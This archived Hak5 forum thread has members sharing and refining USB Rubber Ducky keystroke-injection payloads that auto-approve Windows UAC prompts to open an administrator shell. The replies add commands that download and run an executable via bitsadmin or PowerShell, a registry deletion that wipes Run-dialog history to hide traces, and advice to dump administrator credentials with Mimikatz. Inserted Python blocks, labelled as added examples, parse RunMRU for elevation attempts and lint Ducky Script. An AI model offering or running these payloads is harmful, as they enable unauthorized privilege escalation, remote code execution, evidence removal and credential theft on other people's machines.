Hak5 Forums

Archived
This topic is now archived and is closed to further replies.

[Payload] Faster UAC Bypass
Started by Darren Kitchen, August 19, 2013

17 posts in this topic

Darren Kitchen
Hak5 Junkie

Posted August 19, 2013

The duck is pretty good at bypassing UAC. Let's make it better.

REM *********************************
REM Payload: Old Method to Bypass UAC
REM Target: Windows 7
REM Author: Darren Kitchen
REM *********************************
GUI
DELAY 500
STRING cmd
DELAY 3000
MENU
DELAY 2000
STRING a
REM *************************************************************
REM Depending on Windows Version an ENTER could be necessary here
REM *************************************************************
DELAY 3000
LEFT
ENTER
DELAY 500
STRING echo Admin Prompt in 9 seconds

Not bad. Let's shave another 2 seconds off...

REM ********************************
REM Payload: Less Finicky UAC Bypass
REM Target: Windows 7
REM Author: Darren Kitchen
REM ********************************
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 500
STRING copy con sudo.cmd
ENTER
STRING @echo Set objShell = CreateObject("Shell.Application") > %temp%\sudo.tmp.vbs
ENTER
STRING @echo args = Right("%*", (Len("%*") - Len("%1"))) >> %temp%\sudo.tmp.vbs
ENTER
STRING @echo objShell.ShellExecute "%1", args, "", "runas" >> %temp%\sudo.tmp.vbs
ENTER
STRING @cscript %temp%\sudo.tmp.vbs
ENTER
CTRL z
ENTER
STRING sudo.cmd cmd
ENTER
DELAY 3000
ALT y
DELAY 500
STRING echo Admin Prompt in 7 seconds

Not bad. Let's shave another 2 seconds off...

REM ********************************************
REM Payload: Fastest UAC Bypass using Powershell
REM Target: Windows 7
REM Author: Darren Kitchen
REM ********************************************
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 3000
ALT y
DELAY 500
STRING echo Admin Prompt in 5 seconds

Not bad. Let's shave another 2 seconds off...?
Thoughts?

strangelaw
Newbie

Posted August 19, 2013

(From Brutelogic) > bitsadmin /transfer n http://domain/file c:\%homepath%\file && c:\%homepath%\file

Darren Kitchen
Hak5 Junkie

Posted August 19, 2013

BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Which is why....

powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%temp%\bob.exe')

However cool, it still doesn't open a command prompt bypassing UAC.

overwraith
Hak5 Ninja

Posted August 19, 2013

I found a website that has a way to turn off UAC by command line. Don't know if UAC will still bug you during the turn-off procedure though.
http://www.howtogeek.com/howto/windows-vista/enable-or-disable-uac-from-the-windows-vista-command-line/

nikkelitous
Newbie

Posted August 20, 2013

On 20/08/2013 at 4:06 AM, overwraith said:

    I found a website that has a way to turn off UAC by command line. Don't know if UAC will still bug you during the turn-off procedure though.
    http://www.howtogeek.com/howto/windows-vista/enable-or-disable-uac-from-the-windows-vista-command-line/

Unfortunately, this method requires a reboot. Though it does completely disable UAC rather than just a one-off.

BuckoA51
Hak5 Fan++

Posted August 20, 2013

The countermeasure to this is, of course, don't run as admin, so that every time UAC pops up you have to put your admin password in. This is how a corporate desktop should be configured anyway, (or with UAC off and non-admin accounts for the staff).

Darren Kitchen
Hak5 Junkie

Posted August 20, 2013

On 20/08/2013 at 5:16 PM, BuckoA51 said:

    The countermeasure to this is, of course, don't run as admin, so that every time UAC pops up you have to put your admin password in. This is how a corporate desktop should be configured anyway, (or with UAC off and non-admin accounts for the staff).

Emphasis mine.

411Hall
Hak5 Fan+

Posted August 26, 2013

Good stuff! I have replaced the Toolkit's method with this one.

BuckoA51
Hak5 Fan++

Posted August 30, 2013

Quote

    Emphasis mine.

Too true Darren, I know. Last company I was at doing a quick audit, they had Windows 7 and half the staff were running as admin with UAC on, the other half as admin with UAC disabled, because, you know, it's such a bind to click "Yes" every now and again.

tom564
Hak5 Fan++

Posted September 5, 2013

On 20/08/2013 at 0:49 AM, Darren Kitchen said:

    REM ********************************************
    REM Payload: Fastest UAC Bypass using Powershell
    REM Target: Windows 7
    REM Author: Darren Kitchen
    REM ********************************************
    GUI r
    DELAY 500
    STRING powershell Start-Process cmd -Verb runAs
    ENTER
    DELAY 3000
    ALT y
    DELAY 500
    STRING echo Admin Prompt in 5 seconds

    Not bad. Let's shave another 2 seconds off...?
    Thoughts?

Having powershell Start-Process cmd.exe -Verb runAs as the last run command in the run prompt would make me suspicious if I saw it, is there any way you can clean up after to remove the obvious trace?

Xcellerator
Hak5 Pirate

Posted September 6, 2013

You can delete the entire history from the Run dialog using

reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f

or, you can specify what exact command you want removed with this:

for /f "tokens=1 delims=" %%A in ('reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Ru

or change "powershell Start-Process cmd.exe -Verb RunAs" to anything you like.
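What the defender sees on the other side of that cleanup, as an added example that is not code from the thread or from Hak5: a small Python parser that reconstructs the Run dialog history from a `reg export` of the RunMRU key and flags entries that asked for elevation. The sample export embedded below is constructed for the example; the key's layout (one value per slot letter, the command text suffixed with `\1`, and MRUList holding the slot order, most recent first) is how Explorer stores RunMRU. After a wipe like the `reg delete ... /va /f` above, the same parser returns an empty history, which is itself a signal worth noting on a host where the user runs things from the Run dialog every day.

```python
r"""Reconstruct Run-dialog history from a .reg export of RunMRU.

Added example for this thread, not code from the thread.  Produce the input on
a Windows box with:
    reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU runmru.reg
(reg export writes UTF-16LE; decode the file before passing its text in).
"""
import re

RUNMRU_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Constructed sample export: three Run-dialog entries.  MRUList "cba" says slot c
# (the Start-Process elevation from this thread) was used most recently.
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="notepad\\1"
"b"="cmd\\1"
"c"="powershell Start-Process cmd -Verb runAs\\1"
"MRUList"="cba"
'''

# A .reg export escapes backslash and double quote with a backslash.
_REG_VALUE = re.compile(r'^"([^"]+)"="((?:[^"\\]|\\.)*)"$')
# Matches both "-Verb runAs" and a runas.exe invocation.
_ELEVATION = re.compile(r"\brunas\b", re.IGNORECASE)


def _unescape(value: str) -> str:
    return re.sub(r'\\(["\\])', r'\1', value)


def parse_runmru(reg_text: str, key: str = RUNMRU_KEY) -> list:
    """Return the Run-dialog commands in MRU order, most recent first.

    Slots named in MRUList but absent from the export are skipped; a wiped key
    (what 'reg delete ... /va /f' leaves behind) yields an empty list.
    """
    in_key = False
    values = {}
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_key = line[1:-1].lower() == key.lower()
            continue
        if not in_key:
            continue
        m = _REG_VALUE.match(line)
        if m:
            values[m.group(1)] = _unescape(m.group(2))
    history = []
    for slot in values.get("MRUList", ""):
        cmd = values.get(slot)
        if cmd is None:
            continue
        # Explorer stores each entry as "<command>\1"; strip the marker.
        history.append(cmd[:-2] if cmd.endswith("\\1") else cmd)
    return history


def flag_elevation(history: list) -> list:
    """Entries that requested elevation via the runas verb or runas.exe."""
    return [cmd for cmd in history if _ELEVATION.search(cmd)]


if __name__ == "__main__":
    for cmd in parse_runmru(SAMPLE_EXPORT):
        tag = "  <-- elevation" if flag_elevation([cmd]) else ""
        print(cmd + tag)
```

The parser only looks at the Run dialog. The same elevation attempt also leaves the PowerShell console history and, with process auditing on, a 4688 event for cmd.exe with an elevated token, so wiping RunMRU alone does not make the trace disappear.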

SN4T14
Newbie

Posted September 11, 2013

CONTROL ESCAPE
DELAY 200
STRING cmd
CTRL-SHIFT ENTER
DELAY 2800
ALT y

Another 2 seconds shaved off. :)

Edit: Better version using the run menu, should work when there's a lot of entries in the start menu, and doesn't put an unnecessary "y" in the CMD window if UAC is off.

GUI R
DELAY 200
STRING runas /profile /user:%COMPUTERNAME%\Administrator "cmd"
ENTER
DELAY 2700
ALT y
DELAY 100
BACKSPACE

crackruckles
Newbie

Posted September 16, 2013

1. Press the Win keyboard key or click on Vista Start button.
2. Type cmd into the Start Search text box.
3. Press Ctrl+Shift+Enter keyboard shortcut. Ctrl-Shift-Enter is the general keyboard shortcut that triggers elevation to Run as Administrator.
4. Press Alt+C or press Continue to confirm the UAC elevation warning prompt.

http://www.mydigitallife.info/how-to-open-elevated-command-prompt-with-administrator-privileges-in-windows-vista/

factgasm
Hak5 Fan++

Posted December 3, 2013

The CTRL+SHIFT+ENTER combo works on the keyboard but how do you code that in Ducky Script? Can Ducky Script handle three keys being pressed simultaneously?
I tried this script earlier and it didn't work:

DEFAULTDELAY 50
DELAY 3000
CONTROL ESCAPE
STRING cmd
CONTROL SHIFT ENTER
ALT Y
EXIT
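A way to answer the three-key question before burning an inject.bin, and to check the "N seconds" figures quoted for each payload earlier in the thread: the Python linter below is an added example, not code from the thread or from Hak5. It accepts the instruction vocabulary of the classic duckencoder (REM, DELAY, DEFAULT_DELAY or DEFAULTDELAY, STRING, REPEAT, named keys, and modifiers that are joined with a hyphen such as CTRL-SHIFT), sums the scripted delays, and rejects a modifier followed by two keys. The key and modifier tables, and the rule that the default delay is charged once after every keystroke-producing line, are assumptions about the encoder; check them against the encoder you actually use.

```python
"""Ducky Script 1.0 linter and scripted-delay estimator.

Added example for this thread, not code from the thread or from Hak5.  The
token tables and the DEFAULT_DELAY accounting are assumptions modelled on the
classic duckencoder vocabulary; adjust them if your encoder differs.
"""
from dataclasses import dataclass, field

# Assumed encoder vocabulary.  Two modifiers are written joined with a hyphen
# and count as a single token; a modifier may then be followed by ONE key.
MODIFIERS = {"CTRL", "CONTROL", "SHIFT", "ALT", "GUI", "WINDOWS", "COMMAND",
             "CTRL-ALT", "CTRL-SHIFT", "ALT-SHIFT", "COMMAND-OPTION"}
NAMED_KEYS = {"ENTER", "ESCAPE", "ESC", "TAB", "SPACE", "DELETE", "DEL",
              "BACKSPACE", "MENU", "APP", "UP", "DOWN", "LEFT", "RIGHT",
              "UPARROW", "DOWNARROW", "LEFTARROW", "RIGHTARROW", "HOME", "END",
              "INSERT", "PAGEUP", "PAGEDOWN", "CAPSLOCK", "PRINTSCREEN",
              "PAUSE", "BREAK", "NUMLOCK", "SCROLLLOCK"} | {f"F{i}" for i in range(1, 13)}

# The thread's "Fastest UAC Bypass using Powershell" payload, quoted for the example.
FASTEST_PAYLOAD = """\
REM Payload: Fastest UAC Bypass using Powershell
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 3000
ALT y
DELAY 500
STRING echo Admin Prompt in 5 seconds
"""

# The script from the post above that "didn't work".
THREE_KEY_ATTEMPT = """\
DEFAULTDELAY 50
DELAY 3000
CONTROL ESCAPE
STRING cmd
CONTROL SHIFT ENTER
ALT Y
EXIT
"""


@dataclass
class LintResult:
    delay_ms: int = 0                           # DELAY plus charged default delays
    errors: list = field(default_factory=list)  # one message per rejected line


def lint(script: str) -> LintResult:
    result = LintResult()
    default_delay = 0
    last_cost = 0  # delay charged by the previous line, for REPEAT
    for lineno, raw in enumerate(script.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        instr, _, arg = line.partition(" ")
        instr, arg = instr.upper(), arg.strip()
        if instr == "REM":
            continue
        if instr in ("DELAY", "DEFAULT_DELAY", "DEFAULTDELAY", "REPEAT"):
            if not arg.isdigit():
                result.errors.append(f"line {lineno}: {instr} needs a number, got '{arg}'")
                continue
            n = int(arg)
            if instr == "DELAY":
                result.delay_ms += n
                last_cost = n
            elif instr == "REPEAT":
                result.delay_ms += n * last_cost
            else:
                default_delay = n
            continue
        if instr == "STRING":
            if not arg:
                result.errors.append(f"line {lineno}: STRING needs text to type")
                continue
        else:
            tokens = line.split()
            head, rest = tokens[0].upper(), tokens[1:]
            if head in MODIFIERS:
                if len(rest) > 1:
                    result.errors.append(
                        f"line {lineno}: '{line}': only one key may follow a modifier; "
                        f"join modifiers with a hyphen, e.g. CTRL-SHIFT ENTER")
                    continue
                if rest and not (rest[0].upper() in NAMED_KEYS or len(rest[0]) == 1):
                    result.errors.append(f"line {lineno}: unknown key '{rest[0]}'")
                    continue
            elif head in NAMED_KEYS:
                if rest:
                    result.errors.append(f"line {lineno}: '{head}' takes no argument")
                    continue
            else:
                result.errors.append(f"line {lineno}: unknown instruction '{head}'")
                continue
        # A keystroke-producing line: charge the configured default delay.
        result.delay_ms += default_delay
        last_cost = default_delay
    return result


if __name__ == "__main__":
    for name, script in (("fastest", FASTEST_PAYLOAD), ("three-key attempt", THREE_KEY_ATTEMPT)):
        r = lint(script)
        print(f"{name}: {r.delay_ms} ms of scripted delay, {len(r.errors)} error(s)")
        for e in r.errors:
            print("  " + e)
```

The delay figure is only the scripted waiting time; the payload's own "Admin Prompt in 5 seconds" adds the second or so the duck spends typing the STRING lines, which this estimate does not model.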

googleknowsbest
Hak5 Fan

Posted December 19, 2013

Dialogue box is not highlighted before the ALT y
Win 8

Plazmaz
Newbie

Posted August 19, 2014

You should be able to use this on Windows 8.1:

GUI X
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
ENTER
ALT y

MB60893
Hak5 Zombie

Posted September 6, 2014

Firstly, when you refer to "Bypass" UAC, what you are really saying is don't bring up the dialog box saying "Do you want to run xyz program as Administrator?". What I think would be better is to get administrator rights from a guest user's perspective, just about guaranteeing that any program would work if you needed to execute it.
If I knew someone who was an administrator, I would simply write a ducky script using the CTRL SHIFT ENTER command to elevate PowerShell, then use the "Invoke-Mimikatz" command with "-DumpCreds". This would output the administrator password for the computer (providing it is not a Windows 8/8.1 machine).
I know there is a way you can execute a task as another user... so if you knew the administrator password for a computer, you could simply rock up as a guest, and run the task as an admin user. Thoughts?
